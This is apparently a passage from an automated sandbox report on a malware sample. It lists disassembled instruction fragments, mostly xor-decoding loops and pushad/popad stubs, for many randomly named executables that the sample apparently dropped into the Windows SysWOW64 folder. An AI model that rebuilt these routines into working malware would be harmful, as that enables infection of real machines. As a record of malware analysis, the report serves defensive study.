                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeCode function: 4x nop then loop 00403B3Eh2_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeCode function: 4x nop then mov eax, 0042A000h2_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeCode function: 4x nop then mov ebx, 0042CD70h2_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeCode function: 4x nop then sub ecx, eax2_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeCode function: 4x nop then xor edx, edx2_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeCode function: 4x nop then push eax2_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeCode function: 4x nop then div edi2_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeCode function: 4x nop then xchg eax, ecx2_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeCode function: 4x nop then add eax, edi2_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeCode function: 4x nop then loop 00403B9Eh2_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeCode function: 4x nop then popad 2_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeCode function: 4x nop then xor dword ptr [eax], esi2_2_0042E0A1
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeCode function: 4x nop then jmp 00401219h2_2_0042E0A1
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeCode function: 4x nop then je 00403A1Ch2_2_004039CE
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeCode function: 4x nop then xor dword ptr [eax], ecx2_2_004039CE
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeCode function: 4x nop then inc eax2_2_004039CE
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeCode function: 4x nop then jne 004039F2h2_2_004039CE
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeCode function: 4x nop then mov eax, 0042A000h2_2_004039CE
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeCode function: 4x nop then je 00403A52h2_2_004039CE
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeCode function: 4x nop then xor dword ptr [eax], ecx2_2_004039CE
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeCode function: 4x nop then add eax, 04h2_2_004039CE
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeCode function: 4x nop then jne 00403A3Ah2_2_004039CE
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeCode function: 4x nop then popad 2_2_004039CE
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then mov ecx, dword ptr [eax+04h]3_2_00403A6B
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then add ebx, 04h3_2_00403A6B
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then jl 00403A8Fh3_2_00403A6B
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then add eax, 0Ch3_2_00403A6B
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then popad 3_2_00403A6B
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then pushad 3_2_0042E000
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then mov ebx, 00407EF8h3_2_0042E000
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then mov ecx, ebx3_2_0042E000
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then push eax3_2_0042E000
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then pop eax3_2_0042E000
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then mov esi, 2D4E56AAh3_2_0042E000
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then je 0042E0D2h3_2_0042E000
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then push eax3_2_0042E000
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then xchg eax, ecx3_2_0042E000
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then add eax, edi3_2_0042E000
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then pop edi3_2_00403AC7
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then mov ebx, 00407EF8h3_2_00403AC7
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then sub ecx, eax3_2_00403AC7
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then xor edx, edx3_2_00403AC7
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then push eax3_2_00403AC7
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then div edi3_2_00403AC7
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then xchg eax, ecx3_2_00403AC7
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then add eax, edi3_2_00403AC7
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then loop 00403B3Eh3_2_00403AC7
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then mov eax, 0042A000h3_2_00403AC7
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then mov ebx, 0042CD70h3_2_00403AC7
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then sub ecx, eax3_2_00403AC7
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then xor edx, edx3_2_00403AC7
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then push eax3_2_00403AC7
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then div edi3_2_00403AC7
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then xchg eax, ecx3_2_00403AC7
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then add eax, edi3_2_00403AC7
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then loop 00403B9Eh3_2_00403AC7
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then popad 3_2_00403AC7
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then je 00403A1Ch3_2_004039CE
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then xor dword ptr [eax], ecx3_2_004039CE
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then inc eax3_2_004039CE
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then jne 004039F2h3_2_004039CE
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then mov eax, 0042A000h3_2_004039CE
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then je 00403A52h3_2_004039CE
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then xor dword ptr [eax], ecx3_2_004039CE
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then add eax, 04h3_2_004039CE
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then jne 00403A3Ah3_2_004039CE
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then popad 3_2_004039CE
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then mov ecx, dword ptr [eax+04h]4_2_00403A6B
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then add ebx, 04h4_2_00403A6B
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then jl 00403A8Fh4_2_00403A6B
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then add eax, 0Ch4_2_00403A6B
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then popad 4_2_00403A6B
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then mov ecx, dword ptr [eax+04h]4_2_0042E00C
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then pop edi4_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then mov ebx, 00407EF8h4_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then sub ecx, eax4_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then xor edx, edx4_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then push eax4_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then div edi4_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then xchg eax, ecx4_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then add eax, edi4_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then loop 00403B3Eh4_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then mov eax, 0042A000h4_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then mov ebx, 0042CD70h4_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then sub ecx, eax4_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then xor edx, edx4_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then push eax4_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then div edi4_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then xchg eax, ecx4_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then add eax, edi4_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then loop 00403B9Eh4_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then popad 4_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then je 00403A1Ch4_2_004039CE
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then xor dword ptr [eax], ecx4_2_004039CE
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then inc eax4_2_004039CE
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then jne 004039F2h4_2_004039CE
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then mov eax, 0042A000h4_2_004039CE
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then je 00403A52h4_2_004039CE
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then xor dword ptr [eax], ecx4_2_004039CE
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then add eax, 04h4_2_004039CE
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then jne 00403A3Ah4_2_004039CE
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then popad 4_2_004039CE
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then mov ecx, dword ptr [eax+04h]5_2_00403A6B
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then add ebx, 04h5_2_00403A6B
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then jl 00403A8Fh5_2_00403A6B
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then add eax, 0Ch5_2_00403A6B
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then popad 5_2_00403A6B
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then test eax, eax5_2_0042E000
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then inc eax5_2_0042E000
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then cmp eax, ebx5_2_0042E000
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then pop edi5_2_00403AC7
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then mov ebx, 00407EF8h5_2_00403AC7
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then sub ecx, eax5_2_00403AC7
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then xor edx, edx5_2_00403AC7
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then push eax5_2_00403AC7
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then div edi5_2_00403AC7
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then xchg eax, ecx5_2_00403AC7
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then add eax, edi5_2_00403AC7
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then loop 00403B3Eh5_2_00403AC7
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then mov eax, 0042A000h5_2_00403AC7
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then mov ebx, 0042CD70h5_2_00403AC7
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then sub ecx, eax5_2_00403AC7
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then xor edx, edx5_2_00403AC7
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then push eax5_2_00403AC7
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then div edi5_2_00403AC7
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then xchg eax, ecx5_2_00403AC7
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then add eax, edi5_2_00403AC7
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then loop 00403B9Eh5_2_00403AC7
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then popad 5_2_00403AC7
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then xchg eax, ecx5_2_0042E0A0
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then add eax, edi5_2_0042E0A0
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then je 00403A1Ch5_2_004039CE
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then xor dword ptr [eax], ecx5_2_004039CE
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then inc eax5_2_004039CE
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then jne 004039F2h5_2_004039CE
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then mov eax, 0042A000h5_2_004039CE
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then je 00403A52h5_2_004039CE
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then xor dword ptr [eax], ecx5_2_004039CE
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then add eax, 04h5_2_004039CE
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then jne 00403A3Ah5_2_004039CE
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then popad 5_2_004039CE
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then mov ecx, dword ptr [eax+04h]6_2_00403A6B
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then add ebx, 04h6_2_00403A6B
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then jl 00403A8Fh6_2_00403A6B
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then add eax, 0Ch6_2_00403A6B
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then popad 6_2_00403A6B
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then mov ebx, 00407EF8h6_2_0042E000
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then sub ecx, eax6_2_0042E000
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then push eax6_2_0042E000
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then popad 6_2_0042E000
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then pop edi6_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then mov ebx, 00407EF8h6_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then sub ecx, eax6_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then xor edx, edx6_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then push eax6_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then div edi6_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then xchg eax, ecx6_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then add eax, edi6_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then loop 00403B3Eh6_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then mov eax, 0042A000h6_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then mov ebx, 0042CD70h6_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then sub ecx, eax6_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then xor edx, edx6_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then push eax6_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then div edi6_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then xchg eax, ecx6_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then add eax, edi6_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then loop 00403B9Eh6_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then popad 6_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then je 00403A1Ch6_2_004039CE
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then xor dword ptr [eax], ecx6_2_004039CE
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then inc eax6_2_004039CE
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then jne 004039F2h6_2_004039CE
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then mov eax, 0042A000h6_2_004039CE
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then je 00403A52h6_2_004039CE
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then xor dword ptr [eax], ecx6_2_004039CE
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then add eax, 04h6_2_004039CE
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then jne 00403A3Ah6_2_004039CE
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then popad 6_2_004039CE
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then mov ecx, dword ptr [eax+04h]7_2_00403A6B
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then add ebx, 04h7_2_00403A6B
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then jl 00403A8Fh7_2_00403A6B
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then add eax, 0Ch7_2_00403A6B
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then popad 7_2_00403A6B
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then mov ecx, dword ptr [eax+04h]7_2_0042E00C
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then mov edx, dword ptr [eax+08h]7_2_0042E00C
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then add ebx, 04h7_2_0042E00C
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then jne 0042E01Eh7_2_0042E00C
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then pop edi7_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then mov ebx, 00407EF8h7_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then sub ecx, eax7_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then xor edx, edx7_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then push eax7_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then div edi7_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then xchg eax, ecx7_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then add eax, edi7_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then loop 00403B3Eh7_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then mov eax, 0042A000h7_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then mov ebx, 0042CD70h7_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then sub ecx, eax7_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then xor edx, edx7_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then push eax7_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then div edi7_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then xchg eax, ecx7_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then add eax, edi7_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then loop 00403B9Eh7_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then popad 7_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then je 00403A1Ch7_2_004039CE
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then xor dword ptr [eax], ecx7_2_004039CE
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then inc eax7_2_004039CE
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then jne 004039F2h7_2_004039CE
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then mov eax, 0042A000h7_2_004039CE
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then je 00403A52h7_2_004039CE
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then xor dword ptr [eax], ecx7_2_004039CE
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then add eax, 04h7_2_004039CE
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then jne 00403A3Ah7_2_004039CE
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then popad 7_2_004039CE
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then mov ecx, dword ptr [eax+04h]8_2_00403A6B
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then add ebx, 04h8_2_00403A6B
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then jl 00403A8Fh8_2_00403A6B
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then add eax, 0Ch8_2_00403A6B
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then popad 8_2_00403A6B
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then pushad 8_2_0042E000
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then xor dword ptr [eax], ecx8_2_0042E000
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then jne 0042E024h8_2_0042E000
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then test eax, eax8_2_0042E000
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then je 0042E084h8_2_0042E000
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then xor dword ptr [eax], ecx8_2_0042E000
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then pop edi8_2_00403AC7
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then mov ebx, 00407EF8h8_2_00403AC7
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then sub ecx, eax8_2_00403AC7
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then xor edx, edx8_2_00403AC7
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then push eax8_2_00403AC7
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then div edi8_2_00403AC7
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then xchg eax, ecx8_2_00403AC7
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then add eax, edi8_2_00403AC7
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then loop 00403B3Eh8_2_00403AC7
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then mov eax, 0042A000h8_2_00403AC7
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then mov ebx, 0042CD70h8_2_00403AC7
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then sub ecx, eax8_2_00403AC7
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then xor edx, edx8_2_00403AC7
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then push eax8_2_00403AC7
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then div edi8_2_00403AC7
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then xchg eax, ecx8_2_00403AC7
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then add eax, edi8_2_00403AC7
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then loop 00403B9Eh8_2_00403AC7
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then popad 8_2_00403AC7
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then popad 8_2_0042E09D
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then je 00403A1Ch8_2_004039CE
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then xor dword ptr [eax], ecx8_2_004039CE
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then inc eax8_2_004039CE
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then jne 004039F2h8_2_004039CE
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then mov eax, 0042A000h8_2_004039CE
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then je 00403A52h8_2_004039CE
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then xor dword ptr [eax], ecx8_2_004039CE
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then add eax, 04h8_2_004039CE
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then jne 00403A3Ah8_2_004039CE
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then popad 8_2_004039CE
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then mov ecx, dword ptr [eax+04h]9_2_00403A6B
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then add ebx, 04h9_2_00403A6B
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then jl 00403A8Fh9_2_00403A6B
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then add eax, 0Ch9_2_00403A6B
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then popad 9_2_00403A6B
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then div edi9_2_0042E000
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then xchg eax, ecx9_2_0042E000
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then cmp eax, 00000000h9_2_0042E000
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then mov ebx, 0042CD70h9_2_0042E000
